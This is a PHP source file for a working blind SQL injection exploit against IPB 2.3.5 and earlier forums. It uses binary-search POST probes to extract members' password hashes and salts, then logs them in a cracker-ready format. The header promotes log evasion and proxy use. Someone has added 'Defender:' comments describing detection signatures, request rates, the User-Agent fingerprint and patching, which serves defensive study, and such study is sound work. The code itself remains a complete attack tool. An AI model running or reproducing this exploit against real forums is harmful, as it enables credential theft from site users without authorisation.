- <?php
- // Boolean-based blind SQL injection client for the IPB display-name check
- // endpoint (act=xmlout&do=check-display-name). Reads a target URL, an
- // optional user-ID range and an optional table prefix from argv, then
- // appends one "id:hash:salt" line per valid ID to $outfile.
- // Comments prefixed "Defender:" describe what a target or its operator can
- // observe about a run of this script, or what stops it.
- error_reporting(E_ALL);
- ///////////////////////////////////////////////////////////////////////
- ///////////////////////////////////////////////////////////////////////
- // IPB <= 2.3.5 sql injection exploit
- // Version 1.3
- // written by Wareaxe
- // Modded by Affix
- // http://Root-The.NET
- // based on DarkFig's advisory
- // http://acid-root.new.fr/?0:18
- //
- // FEATURES:
- // 1. Fetching algorithm optimized for speed
- // 2. Attack goes through $_POST, so no suspicious logs
- // 3. Command Line Argument Interface
- // 4. Select from and to User IDs
- // 5. Pretesting saves time if IPB is not vulnerable
- // 6. curl extension autoloading
- // 7. can work with multiple ID-s
- // 8. log format compatible with passwordspro
- //
- // Defender: point 2 only means the POST body is missing from a default
- // access log. The request line (repeated POSTs to the forum root), the
- // fixed MSIE 6.0 User-Agent set in make_post() and the request volume per
- // user ID (see the main loop below) are all visible there; a proxy or WAF
- // that inspects bodies also sees do=check-display-name together with
- // %2527 in the name parameter on every single request.
- ///////////////////////////////////////////////////////////////////////
- //================================================== ===================
- print("RTN IPB <= 2.3.5 Blind SQL Injection Tool \n");
- print("Coded by Waraxe Modded by Affix \n");
- // argv[1] = target base URL (required); argv[2]/argv[3] = first/last user
- // ID to read; argv[4] = IPB table prefix. Values are used as given.
- if(!isset($_SERVER['argv'][1]))
- {
- die("\n\nUsage php -f " . $_SERVER['argv'][0] . " http://site.com/ <start> <end> <prefix>\n\n");
- }
- $url = $_SERVER['argv'][1];
- if(!isset($_SERVER['argv'][2]))
- {
- print("Start and End ID Not Set using 1 and 10 as DEFAULT");
- $id_start = 1;// starting user ID, default value "1" is admin's ID
- if(!isset($_SERVER['argv'][3])){
- $id_end = $id_start + 10;// ending user ID
- }
- }
- else
- {
- $id_start = $_SERVER['argv'][2];
- $id_end = $_SERVER['argv'][3];
- }
- if(!isset($_SERVER['argv'][4]))
- {
- print("Prefix not set reverting to default (ibf_)\n");
- $prefix = 'ibf_';// IPB table prefix, default is "ibf_"
- }
- else
- {
- $prefix = $_SERVER['argv'][4];
- }
- # Proxy settings
- # Be sure to use proxy
- //$proxy_ip_port = '127.0.0.1:8118';
- //$proxy_user_password = 'someuseromepassword';
- // make_post() reads the two names above from $GLOBALS when they are set.
- $outfile = './ipblog.txt';// Log file
- // Defender (forensics): this file, holding a "Target: <url>" line followed
- // by "id:hash:salt" lines and a dashed footer, is the host-side artifact a
- // run leaves behind (see add_line()).
- //================================================== ====================
- ///////////////////////////////////////////////////////////////////////
- // Don't mess below this line, unless you know the stuff
- ///////////////////////////////////////////////////////////////////////
- //================================================== ===================
- ///////////////////////////////////////////////////////////////////////
- //================================================== ===================
- // true when run from the command line; xecho() keys its output escaping on
- // this flag.
- $cli = php_sapi_name() === 'cli';
- //================================================== ===================
- // Warning, if executed from webserver
- //================================================== ===================
- // Served by a webserver, the script stops at an HTML notice unless the
- // request carries the wtf-is-cli parameter, in which case it only lifts
- // the execution time limit (the @ hides a failing set_time_limit()).
- if(!$cli)
- {
- if(!isset($_REQUEST['wtf-is-cli']))
- {
- echo "<html><head><title>Attention!</title></head>\n";
- echo "<body><br /><br /><center>\n";
- echo "<h1>Warning!</h1>\n";
- echo "This exploit is meant to be used as php CLI script!<br />\n";
- echo "More information:<br />\n";
- echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
- echo "Still, you can try to run it from webserver.<br />\n";
- echo "Just press the button below and prepare for long waiting<br />\n";
- echo "And learn to use php CLI next time, please ...<br />\n";
- echo "<form method=\"get\">\n";
- echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
- echo "</form>\n";
- echo "</center></body></html>\n";
- exit;
- }
- else
- {
- // Let's try to maximize our chances without CLI
- @set_time_limit(0);
- }
- }
- //================================================== ===================
- // Main run: one pre-test of the URL, then per user ID one validity probe
- // followed by 32 hash characters and 5 salt characters, each recovered by
- // a binary search of test_condition() requests.
- // Defender: that is roughly two hundred POSTs per user ID, all to the same
- // URL in a short window -- a rate rule on do=check-display-name requests
- // per source catches a run early.
- // Mitigation: a server that answers 'notfound' to the OR 1=1 pre-test in
- // test_target_url() stops the script before any ID is read; that is the
- // reply of a version whose display-name lookup is no longer injectable
- // (presumably anything newer than the 2.3.5 named above).
- xecho("Target: $url\n");
- xecho("Sql table prefix: $prefix\n");
- xecho("Testing target URL ... \n");
- test_target_url();
- xecho("Target URL seems to be valid\n");
- add_line("Target: $url");
- for($i = $id_start; $i <= $id_end; $i ++)
- {
- echo "Testing ID $i\n";
- if(!test_target_id($i))
- {
- echo "ID $i not valid, passing ...\n";
- continue;
- }
- echo "ID $i validated\n";
- $hash = get_hash($i);
- $salt = get_salt($i);
- $line = "$i:$hash:$salt";
- add_line($line);
- xecho("\n------------------------------------------\n");
- xecho("User ID: $i\n");
- xecho("Hash: $hash\n");
- xecho("Salt: $salt");
- xecho("\n------------------------------------------\n");
- }
- add_line("------------------------------------------");
- xecho("\nQuestions and feedback - http://www.waraxe.us/ ~ http://belegit.org \n");
- die("See ya! \n");
- //////////////////////////////////////////////////////////////////////
- //////////////////////////////////////////////////////////////////////
- // Pre-test: one always-true probe (name ending in "%2527 OR 1=1-- ") to
- // the display-name check. Only the literal reply 'found' lets the run
- // continue; 'notfound' is taken as a patched target and any other body as
- // a wrong URL, and both end the process.
- // Defender: this request is the cheapest single thing to alert on -- a
- // POST carrying do=check-display-name whose name value contains %2527 (a
- // double-encoded quote) followed by " OR 1=1-- ".
- function test_target_url()
- {
- global $url;
- $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
- // make_post($url, $post_fields, $cookie, $referer): no cookie, referer = target.
- $buff = trim(make_post($url, $post, '', $url));
- if($buff === 'notfound')
- {
- die("Target is patched? Exiting ...\n");
- }
- if($buff !== 'found')
- {
- print("Invalid response, target URL not valid? Exiting ... \n\n");
- die();
- }
- }
- //////////////////////////////////////////////////////////////////////
- // Returns true when the target reports a user $id whose converge_pass_hash
- // is exactly 32 characters long (get_hashchar() then reads it as lower-case
- // hex), false otherwise. One request via test_condition().
- function test_target_id($id)
- {
- global $url, $prefix;
- // $id and $prefix come straight from argv and are spliced in unquoted.
- $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
- return test_condition($post);
- }
- ///////////////////////////////////////////////////////////////////////
- // Recovers the 5-character converge_pass_salt of user $id one position at a
- // time through get_saltchar(), echoing progress, and returns it as a string.
- function get_salt($id)
- {
- $len = 5;
- $out = '';
- xecho("Finding salt ...\n");
- // positions are 1-based, matching SUBSTR() in get_saltchar()
- for($i = 1; $i < $len + 1; $i ++)
- {
- $ch = get_saltchar($i, $id);
- xecho("Got pos $i --> $ch\n");
- $out .= "$ch";
- xecho("Current salt: $out \n");
- }
- xecho("\nFinal salt for ID $id: $out\n\n");
- return $out;
- }
- ///////////////////////////////////////////////////////////////////////
- // Recovers the byte at 1-based position $pos of user $id's salt by binary
- // searching its ORD() value inside [$min, $max], initially 32..128. Every
- // loop iteration asks the target one "greater than $curr" question ('%253e'
- // is the encoded '>') and halves the interval; once two candidates remain,
- // a single '=' probe picks one and the character is returned.
- // Defender: roughly eight requests per salt character, about forty per user.
- function get_saltchar($pos, $id)
- {
- global $prefix;
- $char = '';
- $min = 32;
- $max = 128;
- $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
- $curr = 0;
- while(1)
- {
- $area = $max - $min;
- if($area < 2 )
- {
- // Interval down to two candidates: one equality probe decides.
- $post = $pattern . "=$max";
- $eq = test_condition($post);
- if($eq)
- {
- $char = chr($max);
- }
- else
- {
- $char = chr($min);
- }
- break;
- }
- $half = intval(floor($area / 2));
- $curr = $min + $half;
- $post = $pattern . '%253e' . $curr;
- $bigger = test_condition($post);
- // 'found' means ORD(char) > $curr, so the answer lies above $curr.
- if($bigger)
- {
- $min = $curr;
- }
- else
- {
- $max = $curr;
- }
- xecho("Current test: $curr-$max-$min\n");
- }
- return $char;
- }
- ///////////////////////////////////////////////////////////////////////
- // Recovers the 32-character converge_pass_hash of user $id one position at
- // a time through get_hashchar(), echoing progress, and returns it as a
- // string.
- function get_hash($id)
- {
- $len = 32;
- $out = '';
- xecho("Finding hash ...\n");
- // positions are 1-based, matching SUBSTR() in get_hashchar()
- for($i = 1; $i < $len + 1; $i ++)
- {
- $ch = get_hashchar($i, $id);
- xecho("Got pos $i --> $ch\n");
- $out .= "$ch";
- xecho("Current hash: $out \n");
- }
- xecho("\nFinal hash for ID $id: $out\n\n");
- return $out;
- }
- ///////////////////////////////////////////////////////////////////////
- // Recovers the hex digit at 1-based position $pos of user $id's hash. One
- // probe ("> 57", i.e. past '9') decides between [a-f] and [0-9]; the rest is
- // the same binary search as get_saltchar() over the narrowed interval,
- // ending in one '=' probe between the last two candidates.
- // Defender: about five or six requests per hash character, so on the order
- // of 160-190 per user for the 32-character hash.
- function get_hashchar($pos, $id)
- {
- global $prefix;
- $char = '';
- $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
- // First let's determine, if it's number or letter
- $post = $pattern . '%253e57';
- $letter = test_condition($post);
- if($letter)
- {
- $min = 97;
- $max = 102;
- xecho("Char to find is [a-f]\n");
- }
- else
- {
- $min = 48;
- $max = 57;
- xecho("Char to find is [0-9]\n");
- }
- $curr = 0;
- while(1)
- {
- $area = $max - $min;
- if($area < 2 )
- {
- // Interval down to two candidates: one equality probe decides.
- $post = $pattern . "=$max";
- $eq = test_condition($post);
- if($eq)
- {
- $char = chr($max);
- }
- else
- {
- $char = chr($min);
- }
- break;
- }
- $half = intval(floor($area / 2));
- $curr = $min + $half;
- $post = $pattern . '%253e' . $curr;
- $bigger = test_condition($post);
- // 'found' means ORD(char) > $curr, so the answer lies above $curr.
- if($bigger)
- {
- $min = $curr;
- }
- else
- {
- $max = $curr;
- }
- xecho("Current test: $curr-$max-$min\n");
- }
- return $char;
- }
- ///////////////////////////////////////////////////////////////////////
- // Sends the injected condition $p wrapped in the fixed display-name template
- // and maps the reply: 'found' => true, 'notfound' => false. An "IPS Driver
- // Error" page ends the run (read as a wrong table prefix); any other body is
- // retried up to $maxtry times and then ends the run as well.
- // Defender: a WAF block page or an empty reply counts as "any other body",
- // and ten of them in a row terminate the whole scan, not just this probe.
- // The template (%2527, %2522, "-- ") is identical in every request and is
- // a usable body signature.
- function test_condition($p)
- {
- global $url;
- $bret = false;
- $maxtry = 10;
- $try = 1;
- // '%%' is a literal '%' for sprintf(); only %s is substituted.
- $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
- $post = sprintf($pattern, $p);
- while(1)
- {
- // make_post() returns false on a transport failure; trim() makes that ''.
- $buff = trim(make_post($url, $post, '', $url));
- if($buff === 'found')
- {
- $bret = true;
- break;
- }
- elseif($buff === 'notfound')
- {
- break;
- }
- elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
- {
- die("Sql error! Wrong prefix?\nExiting ... ");
- }
- else
- {
- xecho("test_condition() - try $try - invalid return value ...\n");
- $try ++;
- if($try > $maxtry)
- {
- die("Too many tries - exiting ...\n");
- }
- else
- {
- xecho("Trying again - try $try ...\n");
- }
- }
- }
- return $bret;
- }
- ///////////////////////////////////////////////////////////////////////
- // Thin cURL wrapper: POSTs $post_fields to $url and returns the response
- // body as a string (headers included when $headers === TRUE), or false when
- // curl_exec() fails. Optional $cookie and $referer are sent when non-empty;
- // a proxy is taken from $GLOBALS['proxy_ip_port'] / ['proxy_user_password'];
- // redirects are not followed. Only the connect timeout is set -- there is
- // no limit on the total transfer time.
- // Defender: the User-Agent is a fixed, obsolete MSIE 6.0 string that is
- // missing its closing ')' -- a per-request fingerprint in access logs.
- function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
- {
- $ch = curl_init();
- $timeout = 120;
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');
- if(!empty($GLOBALS['proxy_ip_port']))
- {
- curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
- if(!empty($GLOBALS['proxy_user_password']))
- {
- curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
- }
- }
- if(!empty($cookie))
- {
- curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
- }
- if(!empty($referer))
- {
- curl_setopt ($ch, CURLOPT_REFERER, $referer);
- }
- if($headers === TRUE)
- {
- curl_setopt ($ch, CURLOPT_HEADER, TRUE);
- }
- else
- {
- curl_setopt ($ch, CURLOPT_HEADER, FALSE);
- }
- $fc = curl_exec($ch);
- curl_close($ch);
- return $fc;
- }
- ///////////////////////////////////////////////////////////////////////
- // Appends $line plus a newline to the global $outfile, opened in binary
- // append mode; a failing fopen() is not checked.
- function add_line($line)
- {
- global $outfile;
- $line .= "\n";
- $fh = fopen($outfile, 'ab');
- fwrite($fh, $line);
- fclose($fh);
- }
- ///////////////////////////////////////////////////////////////////////
- // Prints $line unchanged under the CLI, or HTML-escaped with <br /> line
- // breaks when served by a webserver ($GLOBALS['cli'] is set at top level).
- function xecho($line)
- {
- if($GLOBALS['cli'])
- {
- echo "$line";
- }
- else
- {
- $line = nl2br(htmlspecialchars($line));
- echo "$line";
- }
- }
- //////////////////////////////////////////////////////////////////////
- ?>